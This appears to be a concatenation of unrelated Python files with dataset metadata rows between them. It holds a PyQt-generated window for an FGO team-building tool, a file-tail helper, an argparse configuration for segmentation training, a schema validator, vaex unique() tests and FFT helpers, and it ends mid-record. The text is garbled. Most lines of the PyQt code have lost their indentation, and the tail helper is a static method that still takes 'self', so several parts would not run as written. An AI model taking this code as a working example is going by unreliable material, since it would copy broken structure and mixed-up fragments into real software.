self.round2_servant1_skill3.setObjectName("round2_servant1_skill3")
self.horizontalLayout_111.addWidget(self.round2_servant1_skill3)
self.gridLayout_4.addLayout(self.horizontalLayout_111, 1, 3, 1, 1)
self.verticalLayout_7.addLayout(self.gridLayout_4)
self.gridLayout_5 = QtWidgets.QGridLayout()
self.gridLayout_5.setObjectName("gridLayout_5")
self.round3_servant3_np = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_np.setEnabled(False)
self.round3_servant3_np.setObjectName("round3_servant3_np")
self.gridLayout_5.addWidget(self.round3_servant3_np, 3, 6, 1, 1)
self.horizontalLayout_192 = QtWidgets.QHBoxLayout()
self.horizontalLayout_192.setObjectName("horizontalLayout_192")
self.round3_master_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round3_master_pic.setEnabled(False)
self.round3_master_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round3_master_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round3_master_pic.setText("")
self.round3_master_pic.setIconSize(QtCore.QSize(64, 64))
self.round3_master_pic.setObjectName("round3_master_pic")
self.horizontalLayout_192.addWidget(self.round3_master_pic)
self.gridLayout_5.addLayout(self.horizontalLayout_192, 0, 7, 1, 1)
self.horizontalLayout_92 = QtWidgets.QHBoxLayout()
self.horizontalLayout_92.setObjectName("horizontalLayout_92")
self.round3_servant1_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_pic.setEnabled(False)
self.round3_servant1_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round3_servant1_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round3_servant1_pic.setText("")
self.round3_servant1_pic.setIconSize(QtCore.QSize(64, 70))
self.round3_servant1_pic.setObjectName("round3_servant1_pic")
self.horizontalLayout_92.addWidget(self.round3_servant1_pic)
self.gridLayout_5.addLayout(self.horizontalLayout_92, 0, 3, 1, 1)
self.round3_servant1_np = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_np.setEnabled(False)
self.round3_servant1_np.setObjectName("round3_servant1_np")
self.gridLayout_5.addWidget(self.round3_servant1_np, 3, 3, 1, 1)
self.round3_servant2_np = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_np.setEnabled(False)
self.round3_servant2_np.setObjectName("round3_servant2_np")
self.gridLayout_5.addWidget(self.round3_servant2_np, 3, 5, 1, 1)
self.horizontalLayout_172 = QtWidgets.QHBoxLayout()
self.horizontalLayout_172.setObjectName("horizontalLayout_172")
self.round3_servant3_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_pic.setEnabled(False)
self.round3_servant3_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round3_servant3_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round3_servant3_pic.setText("")
self.round3_servant3_pic.setIconSize(QtCore.QSize(64, 70))
self.round3_servant3_pic.setObjectName("round3_servant3_pic")
self.horizontalLayout_172.addWidget(self.round3_servant3_pic)
self.gridLayout_5.addLayout(self.horizontalLayout_172, 0, 6, 1, 1)
self.horizontalLayout_162 = QtWidgets.QHBoxLayout()
self.horizontalLayout_162.setObjectName("horizontalLayout_162")
self.round3_servant2_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_pic.setEnabled(False)
self.round3_servant2_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round3_servant2_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round3_servant2_pic.setText("")
self.round3_servant2_pic.setIconSize(QtCore.QSize(64, 70))
self.round3_servant2_pic.setObjectName("round3_servant2_pic")
self.horizontalLayout_162.addWidget(self.round3_servant2_pic)
self.gridLayout_5.addLayout(self.horizontalLayout_162, 0, 5, 1, 1)
self.btn_output_strategy = QtWidgets.QPushButton(self.groupBox_3)
self.btn_output_strategy.setEnabled(False)
self.btn_output_strategy.setObjectName("btn_output_strategy")
self.gridLayout_5.addWidget(self.btn_output_strategy, 2, 9, 1, 1)
self.horizontalLayout_132 = QtWidgets.QHBoxLayout()
self.horizontalLayout_132.setObjectName("horizontalLayout_132")
self.round3_servant2_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_skill1.setEnabled(False)
self.round3_servant2_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill1.setText("")
self.round3_servant2_skill1.setIconSize(QtCore.QSize(30, 30))
self.round3_servant2_skill1.setObjectName("round3_servant2_skill1")
self.horizontalLayout_132.addWidget(self.round3_servant2_skill1)
self.round3_servant2_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_skill2.setEnabled(False)
self.round3_servant2_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill2.setText("")
self.round3_servant2_skill2.setIconSize(QtCore.QSize(30, 30))
self.round3_servant2_skill2.setObjectName("round3_servant2_skill2")
self.horizontalLayout_132.addWidget(self.round3_servant2_skill2)
self.round3_servant2_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_skill3.setEnabled(False)
self.round3_servant2_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill3.setText("")
self.round3_servant2_skill3.setIconSize(QtCore.QSize(30, 30))
self.round3_servant2_skill3.setObjectName("round3_servant2_skill3")
self.horizontalLayout_132.addWidget(self.round3_servant2_skill3)
self.gridLayout_5.addLayout(self.horizontalLayout_132, 2, 5, 1, 1)
self.verticalLayout_13 = QtWidgets.QVBoxLayout()
self.verticalLayout_13.setObjectName("verticalLayout_13")
self.round3_label_random = QtWidgets.QLabel(self.groupBox_3)
self.round3_label_random.setEnabled(False)
self.round3_label_random.setObjectName("round3_label_random")
self.verticalLayout_13.addWidget(self.round3_label_random)
self.round3_bar_random = QtWidgets.QSlider(self.groupBox_3)
self.round3_bar_random.setEnabled(False)
self.round3_bar_random.setMaximumSize(QtCore.QSize(100, 16777215))
self.round3_bar_random.setMinimum(90)
self.round3_bar_random.setMaximum(110)
self.round3_bar_random.setProperty("value", 90)
self.round3_bar_random.setOrientation(QtCore.Qt.Horizontal)
self.round3_bar_random.setObjectName("round3_bar_random")
self.verticalLayout_13.addWidget(self.round3_bar_random)
self.gridLayout_5.addLayout(self.verticalLayout_13, 0, 9, 1, 1)
self.horizontalLayout_182 = QtWidgets.QHBoxLayout()
self.horizontalLayout_182.setObjectName("horizontalLayout_182")
self.round3_master_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_master_skill1.setEnabled(False)
self.round3_master_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round3_master_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round3_master_skill1.setText("")
self.round3_master_skill1.setIconSize(QtCore.QSize(30, 30))
self.round3_master_skill1.setObjectName("round3_master_skill1")
self.horizontalLayout_182.addWidget(self.round3_master_skill1)
self.round3_master_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_master_skill2.setEnabled(False)
self.round3_master_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round3_master_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round3_master_skill2.setText("")
self.round3_master_skill2.setIconSize(QtCore.QSize(30, 30))
self.round3_master_skill2.setObjectName("round3_master_skill2")
self.horizontalLayout_182.addWidget(self.round3_master_skill2)
self.round3_master_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_master_skill3.setEnabled(False)
self.round3_master_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round3_master_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round3_master_skill3.setText("")
self.round3_master_skill3.setIconSize(QtCore.QSize(30, 30))
self.round3_master_skill3.setObjectName("round3_master_skill3")
self.horizontalLayout_182.addWidget(self.round3_master_skill3)
self.gridLayout_5.addLayout(self.horizontalLayout_182, 2, 7, 1, 1)
self.horizontalLayout_142 = QtWidgets.QHBoxLayout()
self.horizontalLayout_142.setObjectName("horizontalLayout_142")
self.round3_servant3_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_skill1.setEnabled(False)
self.round3_servant3_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill1.setText("")
self.round3_servant3_skill1.setIconSize(QtCore.QSize(30, 30))
self.round3_servant3_skill1.setObjectName("round3_servant3_skill1")
self.horizontalLayout_142.addWidget(self.round3_servant3_skill1)
self.round3_servant3_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_skill2.setEnabled(False)
self.round3_servant3_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill2.setText("")
self.round3_servant3_skill2.setIconSize(QtCore.QSize(30, 30))
self.round3_servant3_skill2.setObjectName("round3_servant3_skill2")
self.horizontalLayout_142.addWidget(self.round3_servant3_skill2)
self.round3_servant3_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_skill3.setEnabled(False)
self.round3_servant3_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill3.setText("")
self.round3_servant3_skill3.setIconSize(QtCore.QSize(30, 30))
self.round3_servant3_skill3.setObjectName("round3_servant3_skill3")
self.horizontalLayout_142.addWidget(self.round3_servant3_skill3)
self.gridLayout_5.addLayout(self.horizontalLayout_142, 2, 6, 1, 1)
self.horizontalLayout_112 = QtWidgets.QHBoxLayout()
self.horizontalLayout_112.setObjectName("horizontalLayout_112")
self.round3_servant1_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_skill1.setEnabled(False)
self.round3_servant1_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill1.setText("")
self.round3_servant1_skill1.setIconSize(QtCore.QSize(30, 30))
self.round3_servant1_skill1.setObjectName("round3_servant1_skill1")
self.horizontalLayout_112.addWidget(self.round3_servant1_skill1)
self.round3_servant1_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_skill2.setEnabled(False)
self.round3_servant1_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill2.setText("")
self.round3_servant1_skill2.setIconSize(QtCore.QSize(30, 30))
self.round3_servant1_skill2.setObjectName("round3_servant1_skill2")
self.horizontalLayout_112.addWidget(self.round3_servant1_skill2)
self.round3_servant1_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_skill3.setEnabled(False)
self.round3_servant1_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill3.setText("")
self.round3_servant1_skill3.setIconSize(QtCore.QSize(30, 30))
self.round3_servant1_skill3.setObjectName("round3_servant1_skill3")
self.horizontalLayout_112.addWidget(self.round3_servant1_skill3)
self.gridLayout_5.addLayout(self.horizontalLayout_112, 2, 3, 1, 1)
self.verticalLayout_7.addLayout(self.gridLayout_5)
self.horizontalLayout_15.addWidget(self.groupBox_3)
self.verticalLayout_2.addLayout(self.horizontalLayout_15)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1070, 26))
self.menubar.setObjectName("menubar")
self.menu = QtWidgets.QMenu(self.menubar)
self.menu.setObjectName("menu")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.action_update = QtWidgets.QAction(MainWindow)
self.action_update.setObjectName("action_update")
self.action_mooncell = QtWidgets.QAction(MainWindow)
self.action_mooncell.setObjectName("action_mooncell")
self.action_support = QtWidgets.QAction(MainWindow)
self.action_support.setObjectName("action_support")
self.action_kazemai = QtWidgets.QAction(MainWindow)
self.action_kazemai.setObjectName("action_kazemai")
self.action_about = QtWidgets.QAction(MainWindow)
self.action_about.setObjectName("action_about")
self.menu.addAction(self.action_update)
self.menu.addAction(self.action_support)
self.menu.addAction(self.action_about)
self.menu.addSeparator()
self.menu.addAction(self.action_mooncell)
self.menu.addAction(self.action_kazemai)
self.menubar.addAction(self.menu.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        # Chinese UI strings; key terms: 技能 = skill, 宝具 = Noble Phantasm (NP),
        # 等级 = level, 芙芙 = Fou, 随机数 = random factor, 下一回合 = next turn,
        # 输出操作 = export the action sequence.
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "FGO周回组队器"))  # "FGO farming team builder"
self.label_costume_state_4.setText(_translate("MainWindow", "等级: "))
self.label_servant_state_2.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_costume_state_1.setText(_translate("MainWindow", "等级: "))
self.box_skill_confirm.setText(_translate("MainWindow", "技能提示"))
self.label.setText(_translate("MainWindow", "概率阈值:"))
self.label_costume_state_5.setText(_translate("MainWindow", "等级: "))
self.label_costume_state_6.setText(_translate("MainWindow", "等级: "))
self.label_servant_state_1.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_master_state.setText(_translate("MainWindow", "等级:"))
self.label_costume_state_2.setText(_translate("MainWindow", "等级: "))
self.label_servant_state_3.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_servant_state_5.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_costume_state_3.setText(_translate("MainWindow", "等级: "))
self.label_servant_state_4.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_servant_state_6.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
        self.btn_set_progress.setText(_translate("MainWindow", "选择进度"))  # "Select progress"
        self.btn_choose_level.setText(_translate("MainWindow", "设置副本"))  # "Set quest"
        self.btn_confirm_team.setText(_translate("MainWindow", "确 认"))  # "Confirm"
        self.btn_change_team.setText(_translate("MainWindow", "修 改"))  # "Modify"
        self.btn_round_reset.setText(_translate("MainWindow", "撤 销"))  # "Undo"
self.round1_label_random.setText(_translate("MainWindow", "随机数: 0.9"))
self.round1_servant2_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round1_servant3_np.setText(_translate("MainWindow", "宝具: 0%"))
self.btn_round1_next.setText(_translate("MainWindow", "下一回合"))
self.round1_servant1_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round2_servant3_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round2_servant1_np.setText(_translate("MainWindow", "宝具: 0%"))
self.btn_round2_next.setText(_translate("MainWindow", "下一回合"))
self.round2_servant2_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round2_label_random.setText(_translate("MainWindow", "随机数: 0.9"))
self.round3_servant3_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round3_servant1_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round3_servant2_np.setText(_translate("MainWindow", "宝具: 0%"))
self.btn_output_strategy.setText(_translate("MainWindow", "输出操作"))
self.round3_label_random.setText(_translate("MainWindow", "随机数: 0.9"))
        self.menu.setTitle(_translate("MainWindow", "选 项"))  # "Options"
        self.action_update.setText(_translate("MainWindow", "数据库更新"))  # "Update database"
        self.action_mooncell.setText(_translate("MainWindow", "Mooncell"))
        self.action_support.setText(_translate("MainWindow", "软件更新"))  # "Update software"
        self.action_kazemai.setText(_translate("MainWindow", "茹西教王的理想乡"))  # Kazemai FGO data site
        self.action_about.setText(_translate("MainWindow", "关于软件"))  # "About"
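
# Minimal wiring sketch for the generated class above (assumption: pyuic5
# emitted it under its usual name Ui_MainWindow; substitute the real name):
#
#     import sys
#     from PyQt5 import QtWidgets
#
#     app = QtWidgets.QApplication(sys.argv)
#     window = QtWidgets.QMainWindow()
#     ui = Ui_MainWindow()
#     ui.setupUi(window)   # builds every widget configured above
#     window.show()
#     sys.exit(app.exec_())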
| 64.746904
| 106
| 0.748927
| 83,713
| 0.997118
| 0
| 0
| 0
| 0
| 0
| 0
| 5,803
| 0.06912
|
fbf8146cd8db52170f45b639efbed1ee6e4abd99
| 1,177
|
py
|
Python
|
pyhutool/core/Io.py
|
kaysen820/PyHuTool
|
4de4c42a8dc499e22816ebbb3293897ee2b505f1
|
[
"BSD-3-Clause"
] | null | null | null |
pyhutool/core/Io.py
|
kaysen820/PyHuTool
|
4de4c42a8dc499e22816ebbb3293897ee2b505f1
|
[
"BSD-3-Clause"
] | null | null | null |
pyhutool/core/Io.py
|
kaysen820/PyHuTool
|
4de4c42a8dc499e22816ebbb3293897ee2b505f1
|
[
"BSD-3-Clause"
] | null | null | null |
class File:
@staticmethod
def tail(self, file_path, lines=10):
with open(file_path, 'rb') as f:
total_lines_wanted = lines
block_size = 1024
f.seek(0, 2)
block_end_byte = f.tell()
lines_to_go = total_lines_wanted
block_number = -1
blocks = []
while lines_to_go > 0 and block_end_byte > 0:
if block_end_byte - block_size > 0:
f.seek(block_number * block_size, 2)
block = f.read(block_size)
else:
f.seek(0, 0)
block = f.read(block_end_byte)
lines_found = block.count(b'\n')
lines_to_go -= lines_found
block_end_byte -= block_size
block_number -= 1
blocks.append(block)
            # Blocks were read back-to-front; restore file order before joining.
            all_read_text = b''.join(reversed(blocks))
            # splitlines() ignores a trailing newline, avoiding an off-by-one on the last line.
            return all_read_text.splitlines()[-total_lines_wanted:]
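
# A minimal usage sketch (the file name "app.log" is illustrative):
if __name__ == "__main__":
    # tail() returns a list of bytes objects, oldest line of the tail first.
    for line in File.tail("app.log", lines=5):
        print(line.decode("utf-8", errors="replace"))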
| 40.586207
| 76
| 0.507222
| 1,177
| 1
| 0
| 0
| 1,161
| 0.986406
| 0
| 0
| 27
| 0.02294
|
fbf8cddf274b4edc3f9ca19f3358df84f5395fdb
| 4,122
|
py
|
Python
|
utils/argparse.py
|
toytag/self-supervised-learning-for-semantic-segmentation
|
b3326df6d1fa045fabb27fc30542313adee00d30
|
[
"MIT"
] | null | null | null |
utils/argparse.py
|
toytag/self-supervised-learning-for-semantic-segmentation
|
b3326df6d1fa045fabb27fc30542313adee00d30
|
[
"MIT"
] | null | null | null |
utils/argparse.py
|
toytag/self-supervised-learning-for-semantic-segmentation
|
b3326df6d1fa045fabb27fc30542313adee00d30
|
[
"MIT"
] | null | null | null |
import argparse
class ArchParser(argparse.ArgumentParser):
def __init__(self, model_names, *args, **kwargs):
super().__init__(*args, **kwargs)
self.add_argument('-a', '--arch', metavar='ARCH', choices=model_names,
help='model architecture: ' + ' | '.join(model_names))
class BasicParser(argparse.ArgumentParser):
def __init__(self, description='PyTorch Segmentation Pretraining', **kwargs):
super().__init__(description=description, **kwargs)
self.add_argument('data_root', metavar='DIR', help='path to dataset')
self.add_argument('--work-dir', default='./', metavar='DIR',
help='path to work directory (default: ./)')
self.add_argument('--workers', default=32, type=int, metavar='N',
help='number of data loading workers (default: 32)')
self.add_argument('--epochs', default=200, type=int, metavar='N',
help='number of total epochs to run (default: 200)')
self.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
self.add_argument('--crop-size', default=512, type=int,
help='augmentation crop size (default: 512)')
self.add_argument('--batch-size', default=256, type=int, metavar='N',
help='mini-batch size (default: 256), this is the total '
'batch size of all GPUs on the current node when '
'using Data Parallel or Distributed Data Parallel')
self.add_argument('--base-lr', default=0.01, type=float, metavar='LR',
help='initial learning rate', dest='base_lr')
self.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum of SGD solver')
self.add_argument('--wd', '--weight-decay', default=1e-4, type=float, metavar='W',
help='weight decay (default: 1e-4)', dest='weight_decay')
self.add_argument('--print-freq', default=10, type=int, metavar='N',
help='print frequency (default: 10 iters)')
self.add_argument('--checkpoint-freq', default=10, type=int, metavar='N',
help='checkpoint frequency (default: 10 epochs)')
self.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
self.add_argument('--pretrained', default='', type=str, metavar='PATH',
help='path to init checkpoint (default: none)')
self.add_argument('--world-size', default=-1, type=int,
help='number of nodes for distributed training')
self.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
self.add_argument('--dist-url', default='tcp://localhost:29500', type=str,
help='url used to set up distributed training')
self.add_argument('--dist-backend', default='nccl',
type=str, help='distributed backend')
self.add_argument('--seed', default=None, type=int,
help='seed for initializing training.')
self.add_argument('--gpu', default=None,
type=int, help='GPU id to use.')
self.add_argument('--multiprocessing-distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
self.add_argument('--fp16', action='store_true',
                          help='mixed precision training')
self.add_argument('--update-interval', default=1,
type=int, help='gradient update interval')
| 64.40625
| 90
| 0.566715
| 4,100
| 0.994663
| 0
| 0
| 0
| 0
| 0
| 0
| 1,584
| 0.384279
|
fbf9c31021598e1cfc750b4e1fb2c63076b4d3ce
| 2,401
|
py
|
Python
|
finicky/schema.py
|
yaaminu/yaval
|
32f04ecfa092c978fc026f6b7f58d6cf2defd8c9
|
[
"MIT"
] | 14
|
2021-02-12T19:04:21.000Z
|
2021-03-12T18:18:09.000Z
|
finicky/schema.py
|
yaaminu/yaval
|
32f04ecfa092c978fc026f6b7f58d6cf2defd8c9
|
[
"MIT"
] | 5
|
2021-02-12T16:04:37.000Z
|
2021-04-14T12:05:02.000Z
|
finicky/schema.py
|
yaaminu/yaval
|
32f04ecfa092c978fc026f6b7f58d6cf2defd8c9
|
[
"MIT"
] | null | null | null |
from finicky.validators import ValidationException
def validate(schema, data, hook=None):
"""
    Given an input named `data`, validate it against `schema`, returning any errors encountered
    together with the validated data. Note that validation continues even if an error is encountered.
:param schema: The schema against which the input should be validated. A schema is essentially a mapping of field
            names and their corresponding validators. The keys must exactly match the field names in the input data.
Pyval comes with a set of standard validators defined in `finicky.validators` but you can write your own
            if you need a more customized one.
A validator is a function which takes in a single argument and returns the validated
data on success. On failure, it must raise a `finicky.validators.ValidationException`. To illustrate in code:
```
def my_custom_batch_no_validator(input):
if not input:
raise ValidationException("This field is required")
        elif not input.startswith("prefix_"):
raise ValidationException("This field must start with `prefix_`")
else:
# you can modify the value, like striping off whitespace, rounding up the number etc
return input.strip()
```
:param data: The input data to be validated, cannot be none
:param hook: An optional custom hook function that shall be invoked when all fields have passed validation. It is
especially useful in situations where the validity of the input also conditionally relies on multiple
            fields. It takes as input the newly validated data and must return the input on success
or raise a `finicky.validators.ValidationException` on failure. This hook may modify the input before
returning it.
:return: A tuple of the form (errors:str[], validated_data)
"""
errors = {}
validated_data = {}
for key in schema:
try:
validated_data[key] = schema[key](data.get(key))
except ValidationException as e:
errors[key] = e.errors
if hook and not errors:
try:
validated_data = hook(validated_data)
except ValidationException as e:
errors["___hook"] = e.errors
return errors, validated_data
__all__ = ("validate",)
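
# A minimal usage sketch (the field and validator names are hypothetical):
if __name__ == "__main__":
    def require_nonempty(value):
        # Toy validator: reject falsy input, strip surrounding whitespace otherwise.
        if not value:
            raise ValidationException("This field is required")
        return value.strip()

    errors, validated = validate({"name": require_nonempty}, {"name": "  Ada "})
    assert errors == {} and validated == {"name": "Ada"}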
| 49
| 118
| 0.678051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,877
| 0.781758
|
fbfb1bbd5566de1b6744d8dee7be28df74fd818c
| 3,194
|
py
|
Python
|
tests/unique_test.py
|
yohplala/vaex
|
ca7927a19d259576ca0403ee207a597aaef6adc2
|
[
"MIT"
] | null | null | null |
tests/unique_test.py
|
yohplala/vaex
|
ca7927a19d259576ca0403ee207a597aaef6adc2
|
[
"MIT"
] | null | null | null |
tests/unique_test.py
|
yohplala/vaex
|
ca7927a19d259576ca0403ee207a597aaef6adc2
|
[
"MIT"
] | null | null | null |
from common import small_buffer
import pytest
import numpy as np
import pyarrow as pa
import vaex
def test_unique_arrow(df_factory):
ds = df_factory(x=vaex.string_column(['a', 'b', 'a', 'a', 'a', 'b', 'b', 'b', 'b', 'a']))
with small_buffer(ds, 2):
assert set(ds.unique(ds.x)) == {'a', 'b'}
values, index = ds.unique(ds.x, return_inverse=True)
assert np.array(values)[index].tolist() == ds.x.tolist()
def test_unique(df_factory):
ds = df_factory(colors=['red', 'green', 'blue', 'green'])
with small_buffer(ds, 2):
assert set(ds.unique(ds.colors)) == {'red', 'green', 'blue'}
values, index = ds.unique(ds.colors, return_inverse=True)
assert np.array(values)[index].tolist() == ds.colors.tolist()
ds = df_factory(x=['a', 'b', 'a', 'a', 'a', 'b', 'b', 'b', 'b', 'a'])
with small_buffer(ds, 2):
assert set(ds.unique(ds.x)) == {'a', 'b'}
values, index = ds.unique(ds.x, return_inverse=True)
assert np.array(values)[index].tolist() == ds.x.tolist()
def test_unique_f4(df_factory):
x = np.array([np.nan, 0, 1, np.nan, 2, np.nan], dtype='f4')
df = df_factory(x=x)
assert list(sorted(df.x.unique()))[1:] == [np.nan, 0, 1, 2][1:]
def test_unique_nan(df_factory):
x = [np.nan, 0, 1, np.nan, 2, np.nan]
df = df_factory(x=x)
assert list(sorted(df.x.unique()))[1:] == [np.nan, 0, 1, 2][1:]
with small_buffer(df, 2):
values, indices = df.unique(df.x, return_inverse=True)
values = np.array(values)
values = values[indices]
mask = np.isnan(values)
assert values[~mask].tolist() == df.x.to_numpy()[~mask].tolist()
# assert indices.tolist() == [0, 1, 2, 0, 3, 0]
def test_unique_missing(df_factory):
    # Create test data
x = np.array([None, 'A', 'B', -1, 0, 2, '', '', None, None, None, np.nan, np.nan, np.nan, np.nan])
df = df_factory(x=x)
uniques = df.x.unique(dropnan=True)
assert set(uniques) == set(['', 'A', 'B', -1, 0, 2, None])
def test_unique_missing_numeric(array_factory):
df = vaex.from_arrays(x=array_factory([1, None]))
values = df.x.unique()
assert set(values) == {1, None}
# assert list(sorted(df.x.unique()))[1:] == [np.nan, 0, 1, 2][1:]
def test_unique_string_missing(df_factory):
x = ['John', None, 'Sally', None, '0.0']
df = df_factory(x=x)
result = df.x.unique()
assert len(result) == 4
    assert 'John' in result
    assert None in result
    assert 'Sally' in result
def test_unique_list(df_types):
df = df_types
assert set(df.string_list.unique()) == {'aap', 'noot', 'mies', None}
assert set(df.int_list.unique()) == {1, 2, 3, 4, 5, None}
@pytest.mark.parametrize("future", [False, True])
def test_unique_categorical(df_factory, future):
df = df_factory(x=vaex.string_column(['a', 'c', 'b', 'a', 'a']))
df = df.ordinal_encode('x')
df = df._future() if future else df
if future:
assert df.x.dtype == str
assert set(df.x.unique()) == {'a', 'b', 'c'}
assert df.x.nunique() == 3
else:
assert df.x.dtype == int
assert set(df.x.unique()) == {0, 1, 2}
assert df.x.nunique() == 3
| 33.270833
| 102
| 0.584534
| 0
| 0
| 0
| 0
| 500
| 0.156544
| 0
| 0
| 352
| 0.110207
|
fbfb4b2b18ec51f6264b25bae8ef574c623943f4
| 810
|
py
|
Python
|
utils/utilsFreq.py
|
geobook2015/magPy
|
af0f31fc931786ac6f8d69a5290366418035859d
|
[
"Apache-2.0"
] | 1
|
2021-05-19T18:29:15.000Z
|
2021-05-19T18:29:15.000Z
|
utils/utilsFreq.py
|
geobook2015/magPy
|
af0f31fc931786ac6f8d69a5290366418035859d
|
[
"Apache-2.0"
] | null | null | null |
utils/utilsFreq.py
|
geobook2015/magPy
|
af0f31fc931786ac6f8d69a5290366418035859d
|
[
"Apache-2.0"
] | 2
|
2021-06-03T01:59:02.000Z
|
2021-07-03T07:47:10.000Z
|
# utility functions for frequency related stuff
import numpy as np
import numpy.fft as fft
import math
def getFrequencyArray(fs, samples):
    # frequencies go from 0 to the Nyquist frequency
nyquist = fs/2
return np.linspace(0, nyquist, samples)
# use this function for all FFT calculations
# then if change FFT later (i.e. FFTW), just replace one function
def forwardFFT(data, **kwargs):
if "norm" in kwargs and not kwargs["norm"]:
return fft.rfft(data, axis=0)
return fft.rfft(data, norm='ortho', axis=0)
def inverseFFT(data, length, **kwargs):
if "norm" in kwargs and not kwargs["norm"]:
return fft.irfft(data, n=length)
return fft.irfft(data, n=length, norm='ortho')
def padNextPower2(size):
next2Power = math.ceil(math.log(size,2))
next2Size = math.pow(2, int(next2Power))
return int(next2Size) - size
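
# A small self-contained check of how these helpers fit together
# (signal parameters are made up for illustration):
if __name__ == "__main__":
    fs = 128.0
    data = np.sin(2 * np.pi * 5 * np.arange(256) / fs)  # a 5 Hz tone
    data = np.append(data, np.zeros(padNextPower2(data.size)))  # zero-pad to a power of 2
    spec = forwardFFT(data)
    freqs = getFrequencyArray(fs, spec.size)  # one frequency per rfft bin
    assert np.allclose(inverseFFT(spec, data.size), data)  # 'ortho' norm round-trips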
| 27.931034
| 65
| 0.728395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 228
| 0.281481
|
fbfbfe77a095f3da5c436ccb64b9b59f084a3b2c
| 2,329
|
py
|
Python
|
tools/extract_keywords.py
|
bitdotioinc/pglast
|
da4c0b1c237aad98894179af9cd29e044d526ba8
|
[
"PostgreSQL"
] | null | null | null |
tools/extract_keywords.py
|
bitdotioinc/pglast
|
da4c0b1c237aad98894179af9cd29e044d526ba8
|
[
"PostgreSQL"
] | null | null | null |
tools/extract_keywords.py
|
